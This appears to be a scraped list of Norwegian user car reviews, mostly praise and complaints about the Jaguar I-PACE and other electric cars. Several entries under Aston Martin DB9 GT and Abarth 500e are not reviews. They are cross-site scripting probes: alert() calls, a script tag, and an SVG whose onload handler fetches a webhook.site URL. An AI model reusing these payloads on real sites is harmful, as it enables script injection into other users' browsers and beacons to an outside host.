Vurdert av Roger
Jaguar I-PACE (2022)
Jeg har kjørt mange biler. Denne topper alt. Lader du stort sett hjemme / over natten så er den fantastisk.
Jaguar I-PACE (2021)
Kjøpt brukt. Etter 5 uker røk frontmotor/gir og ledning nettverk 12v. Stbrand superforsikring dekker heldigvis rep. Kan bare glede meg til å få den tilbake :)
Jaguar I-PACE (2021)
Meget bra bil
Jaguar I-PACE (2021)
Mye bil for pengene om du kjøper den som 2 gangs eier. Modeller fra 2021 er betydelig oppdatert på flere områder, som gjør at det ikke er like mye problemer som med modellene før 2021. Sportslige
Jaguar I-PACE (2021)
Nydelig bil. Har kjørt Mercedes EQC400 og Tesla model Y før denne. EQC-en er sammenlignbar i kvalitetsfølelse, men føles mye tyngre. Teslaen blir simpel i forhold. Støysvak, lettkjørt og komfort
Jaguar I-PACE (2021)
Mye bil for pengene. Artig å kjøre, men samtidig meget god og komfortabel. Opplevd kvalitet, støy, og bilen generelt gjør at jeg vil anbefale dem som ikke vil ha en bil som "alle" har.
Jaguar I-PACE (2021)
En bra bil så lenge den fungerer! Har hatt bilen i 1 år og 8 mnd. Bilen har stått i 5 mnd på verksted grunnet hybridbatteri feil. Nå er den hentet igjen av berging for 2 gang på 1 år med samme
Jaguar I-PACE (2021)
Meget godt fornøyd med bilen. Har også vært på langtur (ca. 10.000 km) Det var en fornøyelse å kjøre på langtur, men det var endel problemer med å finne ladere som virket. Av den grunn savner
Jaguar I-PACE (2021)
En "drivers car", morsom, sporty og komfortabel. Luftfjæring med regulerbar høydejustering, 4 hjulstrekk med bla lavfriksjonsstart og torque vectoring samt 50/50 vektfordeling gjør den til en for
Jaguar I-PACE (2021)
Veldig god bil å kjøre, kjøreegenskapene ligger ikke langt tilbake for feks Porsche Taycan. Relativt driftssikker og høy kvalitetsfølelse.
Jaguar I-PACE (2021)
Beste bilen jeg har kjørt
Jaguar I-PACE (2021)
Meget fornøyd.
Jaguar I-PACE (2021)
Undervurdert premium elbil. Magisk å kjøre og har perfekt balanse mellom sportslighet og komfort.
Jaguar I-PACE (2021)
Ligger limt til veien. Lynskarp styring. Flyter av gårde :)
Jaguar I-PACE (2021)
Dette er en glimrende elektrisk Jaguar. Har hatt flere jaguarer, men dette må være en av de beste.
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km
BMW 3-Serie (2012)
Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat
MG ZS EV (2022)
Veldig godt fornøyd med bilen på alle måter tatt i betraktning at det var en forholdsvis rimelig bil.